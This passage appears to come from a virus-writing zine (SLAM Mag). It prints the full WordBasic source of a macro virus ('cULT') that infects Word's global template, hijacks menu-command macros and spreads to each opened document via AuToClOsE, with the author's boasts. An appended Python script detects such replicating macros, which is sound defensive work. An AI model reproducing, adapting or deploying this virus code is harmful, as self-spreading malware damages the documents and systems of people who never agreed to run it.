'menu => "&New..."
y = Len(AA$) + 1 'y = length of AA$ + 1
Again2: 'Label Again2.
If l = y Then Goto Finish '-
K$ = Mid$(AA$, l, 1) '|
If K$ = "&" Or K$ = Chr$(46) Or K$ = Chr$(32) Or K$ = "-" Or K$ = "/" Then
l = l + 1 '|remove now again
Goto Again2 '|some characters
Else '|that we don't need.
CC$ = CC$ + K$ '|
l = l + 1 '|
Goto Again2 '|
End If '-
Finish: 'Label Finish.
h$ = Left$(CC$, z) 'h$ = "New"
Name1$ = e$ + h$ 'Name1$ = e$ (File)
'+ h$ (New)
End Function 'end.

Function Name2$(h$) 'Function to get the
a$ = MenuText$(0, 1, 0) 'second name.
x = Len(a$) + 1 : i = 1 : l = 1 '... code is the ...
Again: '... same as before ..
If i = x Then Goto GOON '...
d$ = Mid$(a$, i, 1)
If d$ = Chr$(38) Or d$ = Chr$(46) Or d$ = Chr$(32) Then
i = i + 1
Goto Again
Else
e$ = e$ + d$
i = i + 1
Goto Again
End If
GOON:
z = Len(e$) + 1
AA$ = MenuItemText$(e$, 0, 2, 0)
y = Len(AA$) + 1
Again2:
If l = y Then Goto Finish
K$ = Mid$(AA$, l, 1)
If K$ = "&" Or K$ = Chr$(46) Or K$ = Chr$(32) Or K$ = "-" Or K$ = "/" Then
l = l + 1
Goto Again2
Else
CC$ = CC$ + K$
l = l + 1
Goto Again2
End If
Finish:
h$ = Left$(CC$, z)
Name2$ = e$ + h$ '...
End Function 'end.

Sub MAIN
If CountMacros(0) > 0 Then 'Count all macros in
For o = 1 To CountMacros(0) 'normal.dot. (=>0)
If MacroName$(o, 0) = "cULT" Then 'If there the cULT
k = 1 'macro then k = 1
End If
Next o 'search again.
If k = 1 Then 'If normal.dot is
Goto Finish 'already infected
Else 'then go to Finish.
MacroCopy WindowName$() + ":AuToClOsE", "Global:cULT" 'If not then
ScreenUpdating 'copy the macros.
m$ = Name1$(h$) : n$ = Name2$(h$) 'Get the menu names!
ToolsMacro .Name = m$, .Show = 1, .Edit 'Open the macros and
InsertCode 'insert the link to
ToolsMacro .Name = n$, .Show = 1, .Edit 'the main macro "cULT"
InsertCode
FileSaveAll 1, 1 'Save all.
ScreenUpdating 'Set ScreenUpdating On
End If
Finish: 'Label Finish.

REM CULT! Nightmare Joker (SLAM)

End Sub 'end.

Sub InsertCode 'Routine to insert
StartOfDocument 'the code in the new
LineDown 1 'macro.
CharRight 10 'Insert the string
Insert Chr$(32) '"cULT.DoIt"
StartOfDocument '...
LineDown 4
EndOfLine
InsertPara
Insert "cULT.DoIt"
DocClose 1 'Close and save it.
End Sub 'end.

Sub DoIt 'Routine to infect
On Error Goto Finish 'any active file.
If CountMacros(1) > 0 Then 'Count all macros
For o = 1 To CountMacros(1) 'in the active file.
If MacroName$(o, 1) = "AuToClOsE" Then 'If there the
Infect = 1 'AuToClOsE macro then
End If 'Infect = 1.
Next o 'search again.
End If
If Infect = 0 Then 'If it's not infected
FileSaveAs .Format = 1 'then save it as a
MacroCopy "Global:cULT", WindowName$() + ":AuToClOsE" 'template, copy the
FileSaveAll 1, 1 'macro and again save
End If 'all.
End Sub 'end.

---- End of macro virus -----------------------------------------------------


Yeah, ChAkA now works with every version of Word.
Of course, we could now use more menu macros, but I think it's better to save time at the infection. And you know, WordBasic is really laammee. :(
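
The trigger methods covered above (auto macros, direct action, key bindings and menu-command macros) all depend on the same few WordBasic statements, so one static check over extracted macro source covers them; the triage script below is an added example, not part of the original article. The tag names, the functions `scan_macros` and `verdict`, and the sample macros are constructed for illustration, and the input is assumed to be macro source already dumped to text.

```python
import re

# Macro names Word runs by itself, as listed in the article. Word compares macro
# names case-insensitively, so "aUtOoPeN" and "AuToClOsE" still fire.
AUTO_MACROS = {"autoopen", "autoclose", "autonew", "autoexit", "autoexec"}
# Menu-command names used in the article (English Word only). Localized builds
# use other names, so the statement rules matter more than this list.
MENU_MACROS = {"fileopen", "docclose", "fileexit"}

STMT = r"^\s*(?:If\b.*?\bThen\s+)?"   # statement start, optionally after a one-line If
RULES = [(tag, re.compile(STMT + rx, re.I)) for tag, rx in [
    ("copies-macro", r"MacroCopy\b"),
    ("targets-global-template", r'MacroCopy\b.*"Global:'),
    ("saves-document-as-template", r"FileSaveAs\b.*\.Format\s*=\s*1\b"),
    ("binds-key-to-macro", r"ToolsCustomizeKeyboard\b.*\.Add\b"),
    ("walks-recent-file-list", r"FileList\b"),
    ("edits-another-macro", r"ToolsMacro\b.*\.Edit\b"),
    ("toggles-auto-macros", r"DisableAutoMacros\b"),
    ("writes-ini-setting", r"Set(?:Private)?ProfileString\b"),
]]
TRIGGERS = {"auto-macro-name", "menu-command-name", "binds-key-to-macro",
            "edits-another-macro"}


def strip_comment(line):
    """Drop a WordBasic comment (' or REM) without cutting inside a string literal."""
    if re.match(r"\s*REM\b", line, re.I):
        return ""
    in_string = False
    for pos, ch in enumerate(line):
        if ch == '"':
            in_string = not in_string
        elif ch == "'" and not in_string:
            return line[:pos]
    return line


def scan_macros(macros):
    """macros: dict of macro name -> source text. Returns name -> sorted tag list."""
    report = {}
    for name, source in macros.items():
        tags = set()
        if name.casefold() in AUTO_MACROS:
            tags.add("auto-macro-name")
        if name.casefold() in MENU_MACROS:
            tags.add("menu-command-name")
        for raw in source.splitlines():
            code = strip_comment(raw)
            tags.update(tag for tag, rx in RULES if rx.search(code))
        report[name] = sorted(tags)
    return report


def verdict(tags):
    """A way to get started plus a macro copy is what every sample above has in common."""
    tags = set(tags)
    if "copies-macro" in tags:
        return "replicating" if tags & TRIGGERS else "suspicious"
    return "no-replication-seen"


# Constructed sample input: short fragments in the style of the listings above.
SAMPLE_MACROS = {
    "aUtOoPeN": '''Sub MAIN
DisableAutoMacros 0 'a comment that mentions MacroCopy must not count twice
FileSaveAs .Format = 1
MacroCopy "Global:AutoClose", FileName$() + ":AutoOpen"
End Sub''',
    "Helper1": '''Sub MAIN
ToolsCustomizeKeyboard .KeyCode = 69, .Category = 2, .Name = "Helper1", .Add, .Context = 0
If Installed = 0 Then MacroCopy "Global:Helper1", WindowName$() + ":Helper1"
End Sub''',
    "Letterhead": '''Sub MAIN
Insert "It's a MacroCopy of the memo" 'string literal, not a statement
REM MacroCopy "Global:X", "Y"
End Sub''',
}

if __name__ == "__main__":
    for macro, tags in scan_macros(SAMPLE_MACROS).items():
        print(f"{macro}: {verdict(tags)} {tags}")
```

Because the last listing reads its target names from the menus at run time, a fixed name list cannot be complete; the `copies-macro` and `edits-another-macro` rules are the ones that still apply there.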

More different versions in the next SLAM Mag.

- Nightmare Joker -
